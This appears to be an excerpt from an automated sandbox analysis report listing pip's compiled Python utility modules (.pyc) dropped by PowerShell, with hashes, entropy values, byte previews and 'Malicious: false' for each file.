                                                                                                    Preview:........=.Cf+...............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z...G.d...d.e.........Z.d.a.e.e.d.<.......d.d.e.e.e.f.....d.e.e.....d.e.d.e.d.e.e.....d.e.e.....d.d.f.d...Z.d.d...Z.d.d.d...d.e.d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.d.f.d...Z.y.).zN.A module that implements tooling to enable easy warnings about deprecations.......N)...Any..Optional..TextIO..Type..Union)...parse)...__version__z.DEPRECATION: c...........................e.Z.d.Z.y.)...PipDeprecationWarningN)...__name__..__module__..__qualname__........kC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/deprecation.pyr....r........s.........r....r......_original_showwarning..message..category..filename..lineno..file..line..returnc...........................|...t...........t.........|.|.|.|.|.|...........y.y.t.........|.t.................r't.........j...................d.........}.|.j...................|...........y.t.........|
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3569
                                                                                                    Entropy (8bit):5.074020783674989
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:qinuZGc9ngI/x3+6x+Oj1SCsAWvLMuDUA2awcFTzLVcXPplO3J7o72BJ:qYuN9n2zvNUfcFTzBcXPyN
                                                                                                    MD5:92E4D94786A85172E57AF0A333E49EA7
                                                                                                    SHA1:80C6679E95524B9EDBA83C594F75FD7314544671
                                                                                                    SHA-256:CB52DA676DB6D813F34C21DDD8F2623BA342D552E40B14D4A84B60946A9DA950
                                                                                                    SHA-512:3F89BA7410D5E2E9220A0F0660A3922640AAE4C1E9DFF62A8E8921F0792B7476A62DEAC20C2D8D860F2E64795F2FB7C78EC469E98E31C273671A5AF4A52C7594
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z...d.d.e.d.e.e.....d.e.d.e.f.d...Z.y.)......)...Optional)...ArchiveInfo..DirectUrl..DirInfo..VcsInfo)...Link)...path_to_url)...vcs..direct_url..name..returnc..........................|.j.............................|.d.z...}.g.}.t.........|.j...................t.................rI|.d.j...................|.j...................j...................|.j...................|.j...................j...........................z...}.n.t.........|.j...................t.................rK|.|.j...................z...}.|.j...................j...................rQ|.j...................|.j...................j.............................n+t.........|.j...................t.................s.J...|.|.j...................z...}.|.j...................r.|.j...................d.|.j...................z.............|.r.|.d.d.j...................|.........z...z...}
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3232
                                                                                                    Entropy (8bit):5.365752749742813
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:UFGJ0OKVQtwrNSyKsOENPjIrQI4dMfqtpCY2/GBn/7Keutbj:UQJ0OKVQtwr7IrQI4dFS9
                                                                                                    MD5:86A17B3D6D72A8EEEE5F441A78046507
                                                                                                    SHA1:BD213B494CAFBBEB840B6E1768E4FD715BA06BD8
                                                                                                    SHA-256:B1E0F74D4F78110744F96D3ACE9F6FB0D477E1C66D3F8678FE184855547F5E07
                                                                                                    SHA-512:495692E05860D94BB184022161ED45D0B6DA857C0AC9A059862B3867A89779598ACBED593631B04F809ED40A5E27C549A3F87006256F7722624A37BD4984DA6A
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.g.Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional)...site_packages..user_site)...running_under_virtualenv..virtualenv_no_global..egg_link_path_from_sys_path..egg_link_path_from_location..raw_name..returnc.....................@.....t.........j...................d.d.|.........d.z...|...d...g.S.).a..... Convert a Name metadata value to a .egg-link name, by applying. the same substitution as pkg_resources's safe_name function.. Note: we cannot use canonicalize_name because it has a different logic... We also look for the raw name (without normalization) as setuptools 69 changed. the way it names .egg-link files (https://github.com/pypa/setuptools/issues/4167).. z.[^A-Za-z0-9.]+..-z..egg-link)...re..sub).r....s.... .hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/util
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2164
                                                                                                    Entropy (8bit):5.413958763953937
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Gm0x6hnllixcTsnqCGg3N3tF5wSy0/RkG8HuYPRE31EwpaXSzatlJy0HaTyJAKgp:50qTUq8hp80+7ZEESzc7iTyJAVo8oNI
                                                                                                    MD5:8710016EFD4C6074412454E83E1FDD85
                                                                                                    SHA1:4EF609C39A94A740830F71B1A599F6D4A819A708
                                                                                                    SHA-256:3F3B49B9C5F17D8F9204EDEA03E8E6556FDC5E0D9480F9D4FF6AD2218644D72D
                                                                                                    SHA-512:F8010059D0D7A6BC77864AE2D6794D0E352D5EDC4A35A891040AE80ADD03E0BA53A3B61AB57C1AE7182F0B8160C45201004D797F1483454539DBCD3F555A5AE5
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................>.....U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.g.Z.e.e.e.e.f.........e.d.<.....e.j$..................d.........Z.d.e.d.e.f.d...Z.y.)......N)...List..Tuplez.utf-8z.utf-16z.utf-16-bez.utf-16-lez.utf-32z.utf-32-bez.utf-32-le..BOMSs....coding[:=]\s*([-\w.]+)..data..returnc...........................t.........D.]5..\...}.}.|.j...................|.........s...|.t.........|.........d...j...................|.........c...S...|.j...................d.........d.d...D.]n..}.|.d.d...d.k(..s...t.........j...................|.........s.."t.........j...................|.........}.|...J...|.j...........................d.....j...................d.........}.|.j...................|.........c...S...|.j...................t.........j...................d.........x.s...t.........j......
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3999
                                                                                                    Entropy (8bit):5.25375481750227
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:riOLnhA/35jkXM50vKdOisrKJYz/DixquLg7GR5OFby4MMpoyOCi5h72MhElj9G+:FyKXM5avi5qDicQIGnOFbOaolSh
                                                                                                    MD5:48A931CF37ED96EF1154ABEDBCF23209
                                                                                                    SHA1:EE096D7F2DA35D3B390370D0554DF1CD4A6A4328
                                                                                                    SHA-256:309BA339BEA69EB9A57C0D841A123889EAC74D6D36D9735457A12378D76682A0
                                                                                                    SHA-512:4AF6107C95C4E79AC16532CE1A4F2AFCF06459F10F0673E7A6FCFB8CB220F0972FD9ADED570C884524C90E5F98DB7578F8B23DA8E06DDA1862748043BA5D2F5B
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.e.j...................j.......................d.e.j...................j.....................d.e.j...................j.......................g.Z.e.r4d.d.h.Z...e.j ..................e.e.........D...c.g.c.]...}.d.j#..................|...............c.}.Z.d.d.e.e.e.........d.e.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.y.c...c.}.w.)......N)...List..Optional)...main)...WINDOWS..pip.....z..exe..args..returnc.....................V.....t.........j...................j...................d...........t.........|.........S.).a....Central wrapper for all old entrypoints... Historically pip has had several entrypoints defined. Because of issues. arising from PATH, sys.path, multiple Pythons, their interactions, and most. of them having a pip installed, users suffer every time an entrypoint gets. moved... To alleviate this pain, and provide a mechanism for warning users and. d
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7464
                                                                                                    Entropy (8bit):5.183379975729717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:zfwtbIFxjgsAmlw4tqh7HlIkkdQgfpak9Uk0Q:mbIb0sCk87HD21Qk910Q
                                                                                                    MD5:2C1B28A503ABB98C411642A657F355B2
                                                                                                    SHA1:ACF1FA2E23955B17DC2AA973F9A18F174648C104
                                                                                                    SHA-256:DD4E5EA1ACA667249ABBF90AACA4E4D03846B5CB72C05FBAA2A3D7C128B7A5B1
                                                                                                    SHA-512:0E148066E7B0845F60FA507F22BD48FC1FD3BA60340185F3934968A618D1D7CC9E1EC8000B7A04520DFAE50A9EC7F3E1FB64333877C71701082EF1D257AB1C0F
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.e.d.e.d.e.d.e.e.d.d.f.....f.d...........Z...e.d...e.d...........e.d...................Z...e.e.j:..........................Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.e.....f.d...Z d.e.d.e.e!e"f.....f.d...Z#d.e.d.e.f.d...Z$d.e.d.e.e!e"f.....f.d...Z%d.e.d.e.f.d...Z&y.)......N)...contextmanager)...NamedTemporaryFile)...Any..BinaryIO..Generator..List..Union..cast)...retry..stop_after_delay..wait_fixed)...get_path_uid)...format_size..path..returnc...........................t.........j...................d.k(..s.t.........t.........d.........s.y.t.........j...................j...................|.........s.J...d.}.|.|.k7..r.t.........j...................j...................|.........rLt.........j...........................d.k(..r...t.........|.........}.|.d.k(..S.t.........j...................|
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1170
                                                                                                    Entropy (8bit):5.810045923269114
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:9hCO/Kk2VfU9VPNLilefcNG8WbqmJ3uOc1wlMHMqk2vS15f:zCQKkgOJZouG+xYwJ5aGh
                                                                                                    MD5:D1CB9629B3716001CD84E1F071A4E59E
                                                                                                    SHA1:810FB22681AC3CF537510C2EC08D929469B1E7F7
                                                                                                    SHA-256:D2334649EA49E7D1EAA0BDCD43A44B0657FB5669DA23D4767D94A20DF32061CE
                                                                                                    SHA-512:B966595098F42E387B8F73DE2502E5FCE3255C3C9125207989F41C09B185356256E66B806EC7D7832FAA18DDD9F4AEA8C939B4816A0A278B302A910D321A6773
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................U.d.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.d.f.....e.d.<...d.Z.e.e.d.f.....e.d.<...d.e.f.Z.e.e.d.f.....e.d.<...d.Z.e.e.d.f.....e.d.<...e.e.z...e.z...e.z...Z.d.e.d.e.f.d...Z.y.).z.Filetype information.......)...Tuple)...splitextz..whl).z..tar.bz2z..tbz...BZ2_EXTENSIONS).z..tar.xzz..txzz..tlzz..tar.lzz..tar.lzma..XZ_EXTENSIONSz..zip..ZIP_EXTENSIONS).z..tar.gzz..tgzz..tar..TAR_EXTENSIONS..name..returnc.....................N.....t.........|.........d.....j...........................}.|.t.........v.r.y.y.).z9Return True if `name` is a considered as an archive file......TF).r......lower..ARCHIVE_EXTENSIONS).r......exts.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/filetypes.py..is_archive_filer........s(.........4.........!..!..#.C..... .. ...........N)...__doc__..typingr......pip._internal.utils.miscr......WHEEL_EXTENSIONr......str..__annotations__r....r....r....r......boolr......r....r......<mo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2348
                                                                                                    Entropy (8bit):5.455268771775506
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:tDB8HlSeOhTKlbrpDn80iFwmaJIGaKu3AYoyko/VKy/cWyw7ihE:RB8FiWDn8r10bNYrF/VKCcxNm
                                                                                                    MD5:BC3B1C94839B41D950C16C7DEA6FC185
                                                                                                    SHA1:F09D8D5E98ABA3CDAB34FC4D823A0D0B8457334D
                                                                                                    SHA-256:2C179A98C6F990F7C4967DCF94CD4CA95DD7DE992C1E591A67C43C520B51EE7E
                                                                                                    SHA-512:A6A4F8B9A6DD71F92D0C6FBFD0CF836DFB5EF69598DB9CAD147A5A8C96774423DEBF6B6BCC5A24110CA38126265A7CD1B80B77BAEBF81F7EA2AD3272CD491820
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf).........................p.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.e.....f.d...Z.d.e.e.e.f.....f.d...Z.y.)......N)...Optional..Tuple..returnc...........................t.................x.s...t.................S.).z9Returns glibc version string, or None if not using glibc.)...glibc_version_string_confstr..glibc_version_string_ctypes........eC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/glibc.py..glibc_version_stringr........s........'..)..J.-H.-J..Jr....c..........................t.........j...................d.k(..r.y...t.........j...................d.........}.|...y.|.j...........................\...}.}.|.S.#.t.........t.........t.........f.$.r...Y.y.w.x.Y.w.).z@Primary implementation of glibc_version_string using os.confstr...win32N..CS_GNU_LIBC_VERSION)...sys..platform..os..confstr..split..AttributeError..OSError..ValueError)...gnu_libc_version.._..versions.... r....r....r........se..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7560
                                                                                                    Entropy (8bit):5.332672003633298
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:3Wh8frurxRItcXeGhIX0Htp8jzYcd75dyDPKct:3W6jGRI55X5NdHZct
                                                                                                    MD5:FBA4627B04E4240FD15F94DACF841CAB
                                                                                                    SHA1:20532FD9A718EED3C6FCE30869FA400062EBF62E
                                                                                                    SHA-256:92DC0FFCA46E4E4318DE2180F1142E2FBDECB0A0BA9F7AB74C1CAD817249E6ED
                                                                                                    SHA-512:C4E3CC72242A1905034F9661975D98E981ADD4A53ACD25172F09D6C531B595592AA13B4C7CAC29136838FFF6F5A141178C40F57C3B379640586BC0826E43E121
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...d.d.l.m.Z...d.Z.g.d...Z...G.d...d.........Z...G.d...d.e.........Z.y.)......N)...TYPE_CHECKING..BinaryIO..Dict..Iterable..List..Optional)...HashMismatch..HashMissing..InstallationError)...read_chunks)..._Hash)...NoReturn..sha256).r......sha384..sha512c...........................e.Z.d.Z.d.Z.d.d.e.e.e.e.e.....f.........d.d.f.d...Z.d.d...Z.e.d.e.f.d...........Z.d.e.d.e.d.e.f.d...Z.d.e.e.....d.d.f.d...Z.d.e.e.d.f.....d.d.f.d...Z.d.e.d.d.f.d...Z.d.e.d.d.f.d...Z.d.e.e.e.f.....d.e.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.f.d...Z.y.)...HasheszaA wrapper that builds multiple hashes at once and checks them against. known-good values.. N..hashes..returnc.....................f.....i.}.|..&|.j...........................D.]...\...}.}.t.........|.........|.|.<.......|.|._.........y.).zo. :param hashes: A dict of algorithm names pointing to lists of allowed.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13563
                                                                                                    Entropy (8bit):5.439648470176687
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:NWQE5KJseJJmXuSc/obIAWr6A0bLh+i1cS6687XgP5MSkZ31F4DokhAzqz:N/E5Kvu+Zprcbl+IP+H31yDokhAzO
                                                                                                    MD5:226080653051281E4611B949A1D5E9D2
                                                                                                    SHA1:5BFACE98D4DC4EB069FF6674A970A2EA5728086F
                                                                                                    SHA-256:7BB0463CB50FB85CCEBA3D1E7859F44FF52101443E55BA1D5EDE495E540221D6
                                                                                                    SHA-512:1C4830E1DA973FB36B68FD4C44D77DC3F2BA54D5B337769F1C828BB3DF1A8DD79BFE6748F4CBD909F80A76E7BF88363DA9A6E62624BA204B2BAE00AB18CB9F00
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfS-.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$m%Z%..d.d.l&m'Z'..d.d.l(m)Z)..d.d.l*m+Z+....e.jX..........................Z-..e%d.........Z...G.d...d.e/........Z0d.e.e1....d.e1d.e2f.d...Z3e.jh..................d*d.e5d.e.d.....f.d...........Z6d.e5f.d...Z7..G.d...d.e.jp..........................Z9e...G.d...d.................Z:..G.d...d.e.........Z;..G.d ..d!e.jx..................jz..........................Z>..G.d"..d#e.........Z?..G.d$..d%e.........Z@d&e5d'e2d(e.eA....d.e5f.d)..ZBy.)+.....N)...dataclass)...TextIOWrapper)...Filter)...Any..ClassVar..Generator..List..Optional..TextIO..Type)...Console..ConsoleOptions..ConsoleRenderable..RenderableType..RenderResult..RichCast)...NullHighlighter)...RichHandler)...Segment)...Style)...VERBOSE..getLogger)...WINDOWS)...DEPRECATION_MSG_P
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):34127
                                                                                                    Entropy (8bit):5.445794991738453
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:mlWLeai5j2FLt2Zit9KtywyO5WmTUV6c4YyCfW6ZGZ5f:msL1O2FpyitcUwyQ86UyAWzZ5f
                                                                                                    MD5:666AF5AE350CF584A669D7D425C95DE4
                                                                                                    SHA1:08EBC02EBBFFE945A9C8F3D4F6F242818617856A
                                                                                                    SHA-256:5DCC8DE808D0EC3B2E4F2628D7F0797B3EE26557693D8C3A0ED7D66F96293093
                                                                                                    SHA-512:9099FAB398FBA9C55AAA1869C6498FF4ED8BD56482841AD9CF621C88D94A20035D1462ED5AE29F5934247D863835F8E15E2ADA17285699AD4ED2C17D89065558
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfG\........................D.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0m1Z1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7..d.d.l8m9Z9..d.d.l:m;Z;..d.d.l<m=Z=..g.d...Z>..e.j~..................e@........ZA..e(d.........ZBe&e'eC....eCe.f.....ZDe&eEeEeEf.....ZFe&eGe&e$eG....e$eG....f.....f.....ZHe.e.e.eCg.e.f.....ZIe.e.e.eDg.e.f.....ZJd.eGf.d...ZKd.e&eEd.f.....d.e&eEeEeEf.....f.d...ZLd.eGd.d.f.d...ZMd.eGf.d...ZN..e0d...e1d...........e2d.......................dtd.eGd.eOd e$eI....d.d.f.d!..........ZPd"e.d.d.f.d#..ZQd"e.d.d.f.d$..ZReRd%..d&e.d.e.d'e)eDeCf.....d eId.d.f.d(..ZSd.eGd.eGf.d)..ZTdud.eGd*eGd.eGf.d+..ZUd,eGd-e!eG....d.eGf.d...ZVd,eGd.d.f.d/..ZWd,eGd-e!eG....d.eGf.d0..ZXd,eGd.eGf.d1..ZYd,eGd.eGf.d2..ZZd3eGd.eEf.d4..Z[d5e\d.eGf.d6..Z]d7e!e!e.......
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2718
                                                                                                    Entropy (8bit):4.85197566466278
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:NJ8jY0dBi4vvjT3Q63yCYxgm/lyA9/unkHCA+nssssZM7l61j:4jxfiGnViCYxb/lrV6kifnssssNR
                                                                                                    MD5:99107D0906D93D5FC1879CA925599130
                                                                                                    SHA1:36DE87ED6A274A4DD793D38C5D5DCE16CB32DE29
                                                                                                    SHA-256:767865855D52BA0DDFA836D5C10507FFEA5FA6F682CC04C12054C05E86FB9B3E
                                                                                                    SHA-512:FD0539E5EB86D77D4C828FD6474B443FE09BF97440E3ED55B8C27B10F3AFB89CD5610448244AC893456928F7186290A958B80F9EF3687125835F52E0724D1DC0
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................8.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....G.d...d.........Z.y.).z.Utilities for defining models......N)...Any..Callable..Typec..........................e.Z.d.Z.d.Z.d.d.g.Z.d.e.d.e.d.....d.d.f.d...Z.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.e.e.g.e.f.....d.e.f.d...Z.y.)...KeyBasedCompareMixinz7Provides comparison capabilities that is based on a key.._compare_key.._defining_class..key..defining_class..returnNc..................... .....|.|._.........|.|._.........y...N).r....r....)...selfr....r....s.... .fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/models.py..__init__z.KeyBasedCompareMixin.__init__....s................-..........c.....................,.....t.........|.j...........................S.r....)...hashr....).r....s.... r......__hash__z.KeyBasedCompareMixin.__hash__....s..........D..%..%..&..&r......otherc.....................B.....|.j.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2589
                                                                                                    Entropy (8bit):5.4738492829069125
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:fhm8IaRI4HwcqDvLSwcqzpHYBZcMidyVQ9hSeMK8Uz2tD7ivZXdW0Vm:f/In4HwceOwc2p4B5GyVQbJT8UCmnm
                                                                                                    MD5:487CD5E1ADAE58872FBC3E5E1CDAC1FE
                                                                                                    SHA1:555232B25E27784F5F956A5ED3A37011F2BF92F5
                                                                                                    SHA-256:1FA737EF0A641E64633A3AF566835E70705E03C2D16580ADFE72E2E7C4D599E3
                                                                                                    SHA-512:4B917662AE7E5DA7828459FF4AE1ADF79137B6CF2ABB003A8929907F6AB470B2588E110BCFDA5F075C3D5CBCBFC56FDA0D801659FB6C292460FE065A18F884B5
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf<...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.d.e.........Z...e.j...................e.........Z.d.e.e.....d.e.e.d.f.....d.e.f.d...Z...e.j*..................d...........d.e.d.e.f.d...........Z.d.e.d.e.f.d...Z.y.)......N)...NewType..Optional..Tuple..cast)...specifiers..version....Requirement..NormalizedExtra..requires_python..version_info...returnc..........................|...y.t.........j...................|.........}.t.........j...................d.j...................t.........t.........|.........................}.|.|.v.S.).a..... Check if the given Python version matches a "Requires-Python" specifier... :param version_info: A 3-tuple of ints representing a Python. major-minor-micro version to check (e.g. `sys.version_info[:3]`)... :return: `True` if the given Python version satisfies the requirement.. Otherwise, return `False`... :raises InvalidSpecifier: If `requires_python` has
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4556
                                                                                                    Entropy (8bit):5.711892681876272
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:OY3AuveKp42fODzLNahb1T8B94gMGlVa+4CG8j5ud4bXRZD:Oup4zDzkvinllVFJudaZD
                                                                                                    MD5:3849967B1DC7D00A879D5D16E9FACA46
                                                                                                    SHA1:BA305E0ACDC1A55B7195D12BAD2C0D3D0BBF65D1
                                                                                                    SHA-256:E75812AF9C65E90DE8BE6F7A10912490CE694E19D9F714432E285949450600DF
                                                                                                    SHA-512:47B039160BA0DDA8F57991DBD256A53CA4807E39E91820A9D1C212DE7EB4C2336CA6E90C40CDCE7047678A546D3C91DC2F79E3C50EA3F064F3CA1030B9DEF307
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfS.........................L.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....e.j...................d.........j...........................Z.......d.d.e.d.e.e.e.........d.e.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....d.e.d.e.e.....f.d...Z.d.e.d.e.e.....d.e.e.....f.d...Z.d.e.d.e.e.....d.e.d.e.e.....d.e.e.....d.e.d.e.e.....f.d...Z.d.e.d.e.e.....d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional..Sequenceah.... exec(compile('''. # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py. #. # - It imports setuptools before invoking setup.py, to enable projects that directly. # import from `distutils.core` to work with newer packaging standards.. # - It provides a clear error message when setuptools is not installed.. # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so. # setuptools doesn't think the script is `-c`. This avoids the following warning:. # manifest_maker: standard file '-c' not found"..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8724
                                                                                                    Entropy (8bit):5.553979272179033
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:t64mR4/llxZpfVrhzwONEJlV8LLaj+nbUg2:t64mR4/llHDhzN+58pn4g2
                                                                                                    MD5:EFD84636B48218A089A34FF3052E7D38
                                                                                                    SHA1:1A656F93887CFC516FD571C7E31C8717B6976A01
                                                                                                    SHA-256:D53F302D89CFA35E43477E20FA53CDC4EBF227901ED586DA439B6039D8E03F78
                                                                                                    SHA-512:0A8CB6EA7C50A5E783805116E2C10A04DFCA0B58A9BB70A958232722245D677BD297130752B68369181AB6E2A043687B781FCB2FCD2404369A6CACE8F632CDAA
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.#..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z...e.e.e.e.f.........Z.d.e.e.e.e.f.....d.e.f.d...Z.d.e.e.e.....e.f.....d.e.f.d...Z.d.e.e.e.....e.f.....d.e.e.....f.d...Z...................d.d.e.e.e.....e.f.....d.e.d.e.e.....d.d.d.e.e.e ........d.e.e.e.e.f.........d.e.e.e.........d.e.e.....d.e.e.....d.e.e.....d.e.d.e.f.d...Z!d.e.d.e.d.....f.d...Z"y.)......N)...TYPE_CHECKING..Any..Callable..Iterable..List..Mapping..Optional..Union)...escape)...SpinnerInterface..open_spinner)...InstallationSubprocessError)...VERBOSE..subprocess_logger)...HiddenText)...Literal..args..returnc.....................~.....g.}.|.D.]5..}.t.........|.t.................r.|.j...................|............%|.j...................|............7..|.S.).z&. Create a CommandArgs object.. )...isinstance..list..extend..append).r......command_args..args.... .jC:\Users\b
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12068
                                                                                                    Entropy (8bit):5.343074609217953
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:J0mzwNbGX61tbEPPDdFuhwLKHdNLwPWaINA3rmStBeYryszzzZX:JeFnIPPx8hwLIdNMPhIurhtBeYTZ
                                                                                                    MD5:D2DE5E7B94743F05C9F39799BEFF6088
                                                                                                    SHA1:8CCE2E8BCBD9034292A7FEDAE468E28CDA109936
                                                                                                    SHA-256:C592151D26C1A799FCE9674A5DC6F5C49A939961F6F3A552B015865F6CB42223
                                                                                                    SHA-512:B99D09E0267745574A8CE253985DA490DE8906C395F12866036411E8FD589DC972906D2F4CD56A2B467DBBE4C239AED86849619CC70140629518CA34848E11BB
                                                                                                    Malicious:false
